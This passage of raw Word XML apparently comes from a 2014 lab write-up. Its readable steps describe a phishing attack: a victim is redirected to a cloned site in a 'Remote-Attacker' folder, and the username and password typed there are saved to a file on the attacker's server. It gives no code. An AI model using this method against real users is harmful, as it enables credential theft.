        <w:t xml:space="preserve">2). </w:t>
      </w:r>
      <w:r w:rsidR="00E03F97">
        <w:t>we</w:t>
      </w:r>
      <w:r w:rsidR="00620F16">
        <w:t xml:space="preserve"> are presuming that the victim will click on the phishing </w:t>
      </w:r>
      <w:r w:rsidR="00E03F97">
        <w:t>website.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00620F16" w:rsidRDefault="00620F16" w:rsidP="00F02B0B">
      <w:r>
        <w:t xml:space="preserve">3). </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00E03F97">
        <w:t>This</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> will redirect the user to Remote-Attacker/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>index.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> which Exactly looks same as </w:t>
      </w:r>
      <w:r w:rsidR="00E03F97">
        <w:t>Original.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00620F16" w:rsidRDefault="00620F16" w:rsidP="00F02B0B">
      <w:r>
        <w:t xml:space="preserve">4). Now when the Victim click on any link all pages are coming from victim </w:t>
      </w:r>
      <w:r w:rsidR="00E03F97">
        <w:t>server (</w:t>
      </w:r>
      <w:r>
        <w:t>Remote-Attacker folder)</w:t>
      </w:r>
      <w:r w:rsidR="00E03F97">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E03F97" w:rsidRDefault="00620F16" w:rsidP="00F02B0B">
      <w:r>
        <w:t>5). let’s say victim click on login in navigation menu and type the user name and password.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00620F16" w:rsidRDefault="00620F16" w:rsidP="00F02B0B">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">The password and username is saved in the file in User_pass.html locating in remote attacker </w:t>
      </w:r>
      <w:r w:rsidR="00E03F97">
        <w:t>server (Remote</w:t>
      </w:r>
      <w:r>
        <w:t>-Attack</w:t>
      </w:r>
      <w:r w:rsidR="00E03F97">
        <w:t xml:space="preserve"> folder)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E03F97" w:rsidRDefault="00E03F97" w:rsidP="00F02B0B"/>
    <w:p w:rsidR="00E03F97" w:rsidRDefault="00834686" w:rsidP="00F02B0B">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5943600" cy="24333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F97" w:rsidRDefault="00E03F97" w:rsidP="00F02B0B"/>
    <w:p w:rsidR="00620F16" w:rsidRDefault="00620F16" w:rsidP="00F02B0B"/>
    <w:p w:rsidR="00620F16" w:rsidRDefault="00620F16" w:rsidP="00F02B0B"/>
    <w:p w:rsidR="00F02B0B" w:rsidRPr="007F02C8" w:rsidRDefault="00F02B0B" w:rsidP="00F02B0B"/>
    <w:sectPr w:rsidR="00F02B0B" w:rsidRPr="007F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93D7B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="CC100140"/>
    <w:lvl w:ilvl="0" w:tplc="B7D4F52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0E0F28"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="599AC4A6"/>
    <w:lvl w:ilvl="0" w:tplc="B7D4F5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70ED0"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="094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A25A1"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="BAC6B49A"/>
    <w:lvl w:ilvl="0" w:tplc="B7D4F5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B7611"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="82989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6466EF"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7A7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D0439"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="4FD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B10357"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="9266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3C"/>
    <w:rsid w:val="000047DA"/>
    <w:rsid w:val="00240739"/>
    <w:rsid w:val="002E4F5A"/>
    <w:rsid w:val="005973E2"/>
    <w:rsid w:val="00600F5D"/>
    <w:rsid w:val="00620F16"/>
    <w:rsid w:val="00647BB6"/>
    <w:rsid w:val="00740145"/>
    <w:rsid w:val="00765B1A"/>
    <w:rsid w:val="007F02C8"/>
    <w:rsid w:val="00834686"/>
    <w:rsid w:val="0091683C"/>
    <w:rsid w:val="00921E57"/>
    <w:rsid w:val="00A21320"/>
    <w:rsid w:val="00A768B6"/>
    <w:rsid w:val="00E03F97"/>
    <w:rsid w:val="00F02B0B"/>
    <w:rsid w:val="00FA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04B16-50B0-43C7-A8C7-0B6745CD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7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ASCL</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>ASCL</cp:lastModifiedBy>
  <cp:revision>3</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2014-07-15T11:47:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2014-07-16T07:41:00Z</dcterms:modified>
</cp:coreProperties>
</file>